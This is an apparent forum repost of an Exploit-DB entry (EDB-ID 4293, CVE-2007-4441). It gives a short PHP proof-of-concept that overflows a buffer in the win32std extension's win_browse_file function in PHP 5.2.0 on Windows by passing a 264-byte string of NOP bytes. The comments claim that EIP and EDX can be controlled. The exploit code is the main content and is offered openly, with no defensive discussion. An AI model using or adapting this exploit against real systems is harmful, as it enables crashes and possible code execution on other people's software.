Exploit PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4293
Проверка EDB
  1. Пройдено
Автор
BOECKE
Тип уязвимости
DOS
Платформа
WINDOWS_X86
CVE
cve-2007-4441
Дата публикации
2007-08-18
PHP:
<?php
// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <[email protected]>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
	die;
}

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

?>

# milw0rm.com [2007-08-18]
 
Источник
www.exploit-db.com

Похожие темы